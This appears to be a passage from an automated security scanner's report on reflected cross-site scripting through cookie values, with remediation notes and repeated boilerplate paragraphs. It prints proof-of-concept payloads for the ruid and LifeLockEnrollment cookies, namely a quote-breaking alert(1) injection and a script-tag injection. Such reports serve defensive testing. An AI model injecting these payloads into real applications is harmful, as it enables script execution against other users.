Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5c6"-alert(1)-"83e1c532d15 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dbe7"><script>alert(1)</script>653af69f8df was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.